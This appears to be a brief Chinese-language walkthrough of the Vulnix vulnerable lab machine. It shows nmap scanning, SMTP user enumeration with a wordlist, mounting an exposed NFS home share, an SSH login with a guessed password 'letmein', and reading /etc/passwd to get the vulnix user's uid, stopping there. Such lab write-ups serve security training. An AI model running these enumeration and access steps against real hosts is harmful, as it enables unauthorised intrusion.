发现25端口
nmap -sP 192.168.0.0/24
nmap -sV -A -O 192.168.0.136
对smtp进行枚举
apt-get install smtp-user-enum
smtp-user-enum -M VRFY -U /usr/share/metasploit-framework/data/wordlists/unix_users.txt -t 192.168.0.136
/home/vulnix共享文件夹
并且存在vulnix用户
showmount -e 192.168.0.136
挂在完成,显示没权限
mkdir /tmp/lez
mount -t nfs 192.168.0.136:/home/vulnix /tmp/lez/
ssh登录user
账号:user
密码:letmein
查看/etc/passwd
vulnix的uid为2008